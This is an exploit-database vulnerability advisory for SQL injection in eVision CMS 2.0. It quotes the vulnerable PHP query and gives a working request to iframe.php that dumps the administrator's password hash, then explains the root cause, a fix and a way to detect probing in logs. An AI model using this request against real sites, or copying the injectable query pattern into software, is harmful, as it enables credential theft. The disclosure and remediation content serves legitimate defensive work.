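--+++============================================================+++--
--+++====== eVision CMS <= 2.0 SQL Injection Vulnerability ======+++--
--+++============================================================+++--

[+] Author  : darkjoker
[+] Site    : http://darkjoker.net23.net
[+] Download: http://kent.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz

[+] Vulnerable code:

67 $sql = "SELECT `".$_GET['field']."` FROM ".$_GET['module']." WHERE `id".$_GET['module']."`='".$_GET['id']."'";
68 $result = mysql_query($sql);
69 $row = mysql_fetch_array($result);
70
71 if ( isset($_GET['div']) ) { $div = 'class="'.$_GET['div'].'"'; }
72 else { $div = ''; }
73 if ( isset($_GET['font']) ) { $font = 'class="'.$_GET['font'].'"'; }
74 else { $font = ''; }
75
76 echo '
77
78
79
80
81
82 '.set_text($row[$_GET['field']]).'
83
84 ';

(Lines 77-81 and 83 are empty in this copy; the markup inside the echo string appears to have been stripped.)

[+] It prints admin's password (hashed):
[+] /iframe.php?field=pass&module=users&id=1

[+] Root cause: line 67 builds the query from three request parameters with no validation. `field` and `module` are used directly as the column and table name, and `id` is concatenated into the WHERE clause, so the request alone decides which table and column are read. The page needs no login for this as far as the excerpt shows.

[+] Fix: check `field` and `module` against a fixed allow-list of the column and table names this page is meant to display (identifiers cannot be bound as query parameters), and pass `id` through a prepared statement with a bound parameter (mysqli or PDO; the mysql_* functions used here offer no binding). `div` and `font` on lines 71-74 go into a class attribute unmodified; if they are printed in the stripped markup they should be HTML-escaped (htmlspecialchars with ENT_QUOTES) or restricted to a known set of class names. Whether set_text() escapes the value on line 82 is not visible here.

[+] Detection: in web-server logs, requests to iframe.php whose `field` or `module` values are not ones the site's own pages generate (for example module=users with field=pass) indicate probing of this issue.

# milw0rm.com [2009-01-30]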